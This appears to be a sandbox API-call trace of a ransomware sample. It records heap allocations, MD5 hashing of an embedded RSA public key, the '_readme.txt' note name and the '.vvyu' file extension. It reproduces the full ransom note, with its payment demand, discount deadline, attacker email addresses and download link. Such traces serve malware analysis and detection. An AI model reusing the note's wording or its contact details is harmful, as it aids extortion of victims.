0x2bb8780 [0112.221] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb89e8 [0112.233] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x3e0) returned 0x2b96530 [0112.247] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x5ec) returned 0x2b70df8 [0112.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x2b70df8, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0112.260] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x5f0) returned 0x2ba8638 [0112.274] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b70df8 | out: hHeap=0x2a0000) returned 1 [0112.275] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b96530 | out: hHeap=0x2a0000) returned 1 [0112.301] CryptAcquireContextW (in: phProv=0x18ea44, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18ea44*=0x2f7ff0) returned 1 [0112.304] CryptCreateHash (in: hProv=0x2f7ff0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18ea48 | out: phHash=0x18ea48) returned 1 [0112.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0112.304] CryptHashData (hHash=0x2b737d0, pbData=0x2ba8638, dwDataLen=0x1ec, dwFlags=0x0) returned 1 [0112.304] CryptGetHashParam (in: hHash=0x2b737d0, dwParam=0x2, pbData=0x0, pdwDataLen=0x18ea4c, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ea4c) returned 1 [0112.304] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x11) returned 0x2b15920 [0112.304] CryptGetHashParam (in: hHash=0x2b737d0, dwParam=0x2, pbData=0x2b15920, pdwDataLen=0x18ea4c, dwFlags=0x0 | out: pbData=0x2b15920, pdwDataLen=0x18ea4c) returned 1 [0112.304] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x34) returned 0x2b73b90 [0112.335] GetLastError () returned 0x0 [0112.365] lstrcatA (in: lpString1="", lpString2="B0" | out: lpString1="B0") returned="B0" [0112.365] GetLastError () returned 0x0 [0112.365] lstrcatA (in: lpString1="B0", lpString2="2C" | out: lpString1="B02C") returned="B02C" [0112.365] GetLastError () returned 0x0 [0112.365] lstrcatA (in: lpString1="B02C", lpString2="80" | out: lpString1="B02C80") returned="B02C80" [0112.365] GetLastError () returned 0x0 [0112.365] lstrcatA (in: lpString1="B02C80", lpString2="DC" | out: lpString1="B02C80DC") returned="B02C80DC" [0112.365] GetLastError () returned 0x0 [0112.365] lstrcatA (in: lpString1="B02C80DC", lpString2="8F" | out: lpString1="B02C80DC8F") returned="B02C80DC8F" [0112.365] GetLastError () returned 0x0 [0112.366] lstrcatA (in: lpString1="B02C80DC8F", lpString2="EB" | out: lpString1="B02C80DC8FEB") returned="B02C80DC8FEB" [0112.366] GetLastError () returned 0x0 [0112.366] lstrcatA (in: lpString1="B02C80DC8FEB", lpString2="F5" | out: lpString1="B02C80DC8FEBF5") returned="B02C80DC8FEBF5" [0112.366] GetLastError () returned 0x0 [0112.366] lstrcatA (in: lpString1="B02C80DC8FEBF5", lpString2="87" | out: lpString1="B02C80DC8FEBF587") returned="B02C80DC8FEBF587" [0112.366] GetLastError () returned 0x0 [0112.366] lstrcatA (in: lpString1="B02C80DC8FEBF587", lpString2="A0" | out: lpString1="B02C80DC8FEBF587A0") returned="B02C80DC8FEBF587A0" [0112.366] GetLastError () returned 0x0 [0112.366] lstrcatA (in: lpString1="B02C80DC8FEBF587A0", lpString2="F6" | out: lpString1="B02C80DC8FEBF587A0F6") returned="B02C80DC8FEBF587A0F6" [0112.366] GetLastError () returned 0x0 [0112.366] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F6", lpString2="2E" | out: lpString1="B02C80DC8FEBF587A0F62E") returned="B02C80DC8FEBF587A0F62E" [0112.366] GetLastError () returned 0x0 [0112.366] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E", lpString2="01" | out: lpString1="B02C80DC8FEBF587A0F62E01") returned="B02C80DC8FEBF587A0F62E01" [0112.366] GetLastError () returned 0x0 [0112.366] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01", lpString2="DA" | out: lpString1="B02C80DC8FEBF587A0F62E01DA") returned="B02C80DC8FEBF587A0F62E01DA" [0112.366] GetLastError () returned 0x0 [0112.366] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DA", lpString2="DA" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA") returned="B02C80DC8FEBF587A0F62E01DADA" [0112.366] GetLastError () returned 0x0 [0112.366] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DADA", lpString2="40" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA40") returned="B02C80DC8FEBF587A0F62E01DADA40" [0112.366] GetLastError () returned 0x0 [0112.366] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DADA40", lpString2="CE" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA40CE") returned="B02C80DC8FEBF587A0F62E01DADA40CE" [0112.366] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b15920 | out: hHeap=0x2a0000) returned 1 [0112.366] CryptDestroyHash (hHash=0x2b737d0) returned 1 [0112.367] CryptReleaseContext (hProv=0x2f7ff0, dwFlags=0x0) returned 1 [0112.367] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ba8638 | out: hHeap=0x2a0000) returned 1 [0112.367] lstrlenA (lpString="B02C80DC8FEBF587A0F62E01DADA40CE") returned 32 [0112.367] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x3e0) returned 0x2b96530 [0112.367] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x5ec) returned 0x2b70df8 [0112.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x2b70df8, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0112.368] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x5f0) returned 0x2ba8638 [0112.368] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b70df8 | out: hHeap=0x2a0000) returned 1 [0112.369] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b96530 | out: hHeap=0x2a0000) returned 1 [0112.369] lstrcpyA (in: lpString1=0x2afd6e8, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0112.369] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ba8638 | out: hHeap=0x2a0000) returned 1 [0112.369] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x60) returned 0x2b286f0 [0112.369] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x28) returned 0x2afd608 [0112.370] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb8c50 [0112.370] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb8eb8 [0112.370] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb9120 [0112.370] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb9388 [0112.370] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb95f0 [0112.370] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb9910 [0112.370] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb9b78 [0112.370] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb9de0 [0112.370] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bba048 [0112.370] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bba2b0 [0112.386] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x816) returned 0x2b82048 [0112.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b82048, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0112.386] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2b77388 [0112.387] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b82048 | out: hHeap=0x2a0000) returned 1 [0112.387] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x28) returned 0x2afd0c8 [0112.387] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bba518 [0112.387] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bba780 [0112.387] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bba9e8 [0112.387] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bbac50 [0112.387] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bbaeb8 [0112.387] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bbb120 [0112.387] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bbb388 [0112.387] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bbb5f0 [0112.387] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb1a88 [0112.387] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb1cf0 [0112.387] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xa0) returned 0x2b97108 [0112.387] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x130) returned 0x2b7dc88 [0112.388] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b97108 | out: hHeap=0x2a0000) returned 1 [0112.388] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x1d0) returned 0x2b4afc0 [0112.388] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b7dc88 | out: hHeap=0x2a0000) returned 1 [0112.388] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x2b7) returned 0x2b942c0 [0112.388] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4afc0 | out: hHeap=0x2a0000) returned 1 [0112.388] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x412) returned 0x2bb5a70 [0112.389] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b942c0 | out: hHeap=0x2a0000) returned 1 [0112.389] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x61a) returned 0x2b70df8 [0112.389] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bb5a70 | out: hHeap=0x2a0000) returned 1 [0112.389] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x440) returned 0x2b96530 [0112.389] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x1068) returned 0x2bbb8f8 [0112.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b96530, cbMultiByte=-1, lpWideCharStr=0x2bbb8f8, cchWideChar=2100 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned 1077 [0112.389] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x1070) returned 0x2b84328 [0112.390] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bbb8f8 | out: hHeap=0x2a0000) returned 1 [0112.390] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b96530 | out: hHeap=0x2a0000) returned 1 [0112.390] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x28) returned 0x2b7cb90 [0112.390] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb1f58 [0112.390] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb21c0 [0112.390] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb2428 [0112.391] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb2690 [0112.391] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb28f8 [0112.391] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb2b60 [0112.391] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb2dc8 [0112.391] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb3030 [0112.391] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb3298 [0112.391] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb3500 [0112.391] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x80a) returned 0x2b82048 [0112.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b82048, cchWideChar=1029 | out: lpWideCharStr=".vvyu") returned 6 [0112.391] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x810) returned 0x2bbb8f8 [0112.391] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b82048 | out: hHeap=0x2a0000) returned 1 [0112.391] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b6ffc8 [0112.391] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4d830 [0112.403] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b15940 | out: hHeap=0x2a0000) returned 1 [0112.403] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x50) returned 0x2b2ed68 [0112.403] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x48) returned 0x2b388a0 [0112.403] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4d830 | out: hHeap=0x2a0000) returned 1 [0112.403] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x60) returned 0x2b285b8 [0112.403] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x60) returned 0x2b28688 [0112.403] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b388a0 | out: hHeap=0x2a0000) returned 1 [0112.404] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2afc218 [0112.404] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x90) returned 0x2bafa88 [0112.404] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b28688 | out: hHeap=0x2a0000) returned 1 [0112.404] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x50) returned 0x2b2ee70 [0112.404] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x50) returned 0x2b2ee18 [0112.404] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xd8) returned 0x3631b0 [0112.404] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bafa88 | out: hHeap=0x2a0000) returned 1 [0112.404] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2afc068 [0112.416] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b6fff0 [0112.416] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x50) returned 0x2b2ed10 [0112.416] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x138) returned 0x2b7dc88 [0112.417] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x3631b0 | out: hHeap=0x2a0000) returned 1 [0112.417] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x60) returned 0x2b28688 [0112.417] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2afc458 [0112.417] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x50) returned 0x2ba1490 [0112.417] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x50) returned 0x2ba14e8 [0112.417] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x1c8) returned 0x2b4afc0 [0112.418] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b7dc88 | out: hHeap=0x2a0000) returned 1 [0112.418] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2afc380 [0112.432] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b85b40 | out: hHeap=0x2a0000) returned 1 [0112.432] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b6ffc8 | out: hHeap=0x2a0000) returned 1 [0112.432] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b2ed68 | out: hHeap=0x2a0000) returned 1 [0112.433] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b285b8 | out: hHeap=0x2a0000) returned 1 [0112.433] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2afc218 | out: hHeap=0x2a0000) returned 1 [0112.433] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b2ee70 | out: hHeap=0x2a0000) returned 1 [0112.433] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b2ee18 | out: hHeap=0x2a0000) returned 1 [0112.434] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2afc068 | out: hHeap=0x2a0000) returned 1 [0112.434] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b6fff0 | out: hHeap=0x2a0000) returned 1 [0112.435] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b2ed10 | out: hHeap=0x2a0000) returned 1 [0112.435] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b28688 | out: hHeap=0x2a0000) returned 1 [0112.435] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2afc458 | out: hHeap=0x2a0000) returned 1 [0112.445] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ba1490 | out: hHeap=0x2a0000) returned 1 [0112.445] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ba14e8 | out: hHeap=0x2a0000) returned 1 [0112.446] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2afc380 | out: hHeap=0x2a0000) returned 1 [0112.446] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4afc0 | out: hHeap=0x2a0000) returned 1 [0112.446] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x28) returned 0x2b7cbf0 [0112.446] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb3768 [0112.446] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb39d0 [0112.446] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb3c38 [0112.446] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb3ea0 [0112.446] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb4108 [0112.446] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb4370 [0112.446] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb45d8 [0112.446] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb4840 [0112.446] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb4aa8 [0112.446] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x25c) returned 0x2bb4d10 [0112.446] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xa0) returned 0x2b97108 [0112.446] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x130) returned 0x2b7dc88 [0112.447] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b97108 | out: hHeap=0x2a0000) returned 1 [0112.447] 